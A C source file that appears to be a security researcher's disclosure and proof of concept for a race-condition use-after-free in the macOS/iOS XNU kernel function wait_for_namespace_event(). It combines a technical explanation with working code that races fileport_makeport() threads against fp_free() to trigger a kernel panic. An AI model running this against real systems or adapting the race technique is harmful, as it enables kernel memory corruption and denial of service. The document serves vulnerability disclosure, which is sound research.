// Brandon Azad
#if 0
iOS/macOS: Kernel use-after-free due to race condition in wait_for_namespace_event()

The XNU function wait_for_namespace_event() in bsd/vfs/vfs_syscalls.c releases a file descriptor
for use by userspace but may then subsequently destroy that file descriptor using fp_free(), which
unconditionally frees the fileproc and fileglob. This opens up a race window during which the
process could manipulate those objects while they're being freed. Exploitation requires root
privileges.

The function wait_for_namespace_event() is reachable from fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT); it
is used to listen for filesystem events for generating a snapshot. Here is the vulnerable path in
the code:

	static int
	wait_for_namespace_event(namespace_handler_data *nhd, nspace_type_t nspace_type)
	{
	...
			error = falloc(p, &fp, &indx, ctx);
			if (error) goto cleanup;
			fp_alloc_successful = true;
	...
			proc_fdlock(p);
			procfdtbl_releasefd(p, indx, NULL);
			fp_drop(p, indx, fp, 1);
			proc_fdunlock(p);
	...
			error = copyout(&nspace_items[i].token, nhd->token, sizeof(uint32_t));
			if (error) goto cleanup;
	...
	cleanup:
			if (error) {
				if (fp_alloc_successful) fp_free(p, indx, fp);
	...
	}

First the file descriptor (indx) and fileproc (fp) are allocated using falloc(). At this point the
file descriptor is reserved, and hence unavailable to userspace. Next, procfdtbl_releasefd() is
called to release the file descriptor for use by userspace. After the subsequent proc_fdunlock(),
another thread in the process could access that file descriptor via another syscall, even while
wait_for_namespace_event() is still running.

This is problematic because in the error path wait_for_namespace_event() (reachable if copyout()
fails) expects to be able to free the file descriptor with fp_free(). fp_free() is a very
special-purpose function: it will clear the file descriptor, free the fileglob, and free the
fileproc, without taking into consideration whether the fileproc or fileglob are referenced
anywhere else.

One way to violate these expectations is to make a call to fileport_makeport() in between the
proc_fdunlock() and the fp_free(). The ideal case for exploitation would be that a fileport is
created which holds a reference to the fileglob before the fp_free() is used to free it, leaving a
dangling fileglob pointer in the fileport. In practice it's tricky to end up in that state, but I
believe it's possible.

The attached POC should trigger a kernel panic. The POC works as follows: First, an HFS DMG is
created and mounted because the only paths that reach wait_for_namespace_event() pass through the
HFS driver. Next, several racer threads are created which repeatedly try to call
fileport_makeport(). Then, fsctl(FSIOC_SNAPSHOT_HANDLER_GET_EXT) is called to block in
wait_for_namespace_event(). The namespace_handler_info_ext structure passed to fsctl() is set up
such that the last call to copyout() will fail, which will cause fp_free() to be called. Finally,
in order to trigger the bug, another process creates and removes a directory on the mounted HFS
DMG, which causes nspace_snapshot_event() to generate an event that wait_for_namespace_event() was
waiting for. Usually this will generate a panic with the message "a freed zone element has been
modified".

Tested on macOS 10.14.6 (18G87).
#endif

#include <assert.h>
#include <mach/mach.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

struct namespace_handler_info_ext {
	int32_t    *token;
	int64_t    *flags;
	int32_t    *fdptr;
	int64_t    *infoptr;
};

#define FSIOC_SNAPSHOT_HANDLER_GET_EXT			_IOW('A', 13, struct namespace_handler_info_ext)
#define FSIOC_NAMESPACE_HANDLER_SET_SNAPSHOT_TIME	_IOW('A', 8, int32_t)
#define FSIOC_NAMESPACE_ALLOW_DMG_SNAPSHOT_EVENTS	_IOW('A', 11, int32_t)

// Create 20 racing threads.
#define THREAD_COUNT	20

// We will target file descriptor 0, since this is the lowest file descriptor number and hence the
// first to be reused.
#define TARGET_FD	0

// Global space for each thread to stash its fileport if it wins the race.
mach_port_t fileport[THREAD_COUNT] = {};

// Prototype for fileport_makeport().
extern int fileport_makeport(int fd, mach_port_t *name);

// This function will repeatedly try to stash the target file descriptor into a fileport. The
// target file descriptor is initially unallocated, so this will repeatedly fail until
// wait_for_namespace_event() creates and releases the new fd. Once procfdtbl_releasefd() and
// proc_fdunlock() are called, the file descriptor will become available to be used and manipulated
// in userspace, even as wait_for_namespace_event() continues to process it. Our goal is to win the
// race window between the proc_fdunlock() and fp_free() to stash a pointer to the fileglob before
// it is freed or to manipulate a fileproc after it has been freed.
static void *
stash_fileport_racer(void *arg) {
	int id = (int)(uintptr_t)arg;
	for (;;) {
		// Try to stash the target file descriptor into a fileport.
		int ret = fileport_makeport(TARGET_FD, &fileport[id]);
		if (ret == 0) {
			break;
		}
	}
	return NULL;
}

int
main(int argc, const char *argv[]) {
	const char *hfs_dmg_mount = argv[1];
	// Create a mapped region right in front of an unmapped one. We'll force a copyout() to an
	// unmapped address to ensure that wait_for_namespace_event() takes the path that
	// fp_free()'s the fileproc (hopefully after we've grabbed a reference to it). In order to
	// maximize the time for the race window, we'll have the last byte of
	// namespace_handler_info_ext->infoptr[1] be on the unmapped page.
	uint8_t *map = mmap(NULL, 0x8000,
			PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	assert(map != MAP_FAILED);
	int ret = munmap(map + 0x4000, 0x4000);
	assert(ret == 0);
	// Close the target file descriptor so that it will be allocated by
	// wait_for_namespace_event().
	close(TARGET_FD);
	// Create the racer threads. These threads will try to stash the target file descriptor
	// into a fileport after wait_for_namespace_event() has exposed the file descriptor but
	// before the fp_free().
	for (int id = 0; id < THREAD_COUNT; id++) {
		pthread_t thread;
		pthread_create(&thread, NULL, stash_fileport_racer, (void *)(uintptr_t)id);
		pthread_detach(thread);
	}
	// Set the snapshot time to as high as possible so that nspace_snapshot_event() will pass
	// the event to resolve_nspace_item_ext().
	int32_t snapshot_time = -1;
	ret = fsctl(hfs_dmg_mount, FSIOC_NAMESPACE_HANDLER_SET_SNAPSHOT_TIME, &snapshot_time, 0);
	assert(ret == 0);
	// Set the kernel to allow snapshot events on DMGs.
	int32_t allow = 1;
	ret = fsctl(hfs_dmg_mount, FSIOC_NAMESPACE_ALLOW_DMG_SNAPSHOT_EVENTS, &allow, 0);
	assert(ret == 0);
	// Call the vulnerable function wait_for_namespace_event(). Because infoptr points to
	// unmapped memory, the error path will be taken, causing fp_free() to be called.
	int32_t token = 0xabababab;
	int64_t flags = 0xabababababababab;
	int32_t fd = 0xabababab;
	int64_t *info = (int64_t *)(map + 0x4000 - 2 * sizeof(int64_t) + 1);
	info[0] = 0xabababababababab;
	struct namespace_handler_info_ext nhie = {
		.token   = &token,
		.flags   = &flags,
		.fdptr   = &fd,
		.infoptr = info,
	};
	ret = fsctl(hfs_dmg_mount, FSIOC_SNAPSHOT_HANDLER_GET_EXT, &nhie, 0);
	printf("namespace_handler_info_ext = {\n"
			"\ttoken   = 0x%08x\n"
			"\tflags   = 0x%016llx\n"
			"\tfd      = 0x%08x\n"
			"\tinfo[0] = 0x%016llx\n"
			"\tinfo[1] = ???\n"
			"}\n",
			token, flags, fd, info[0]);
	sleep(1);
	return 0;
}
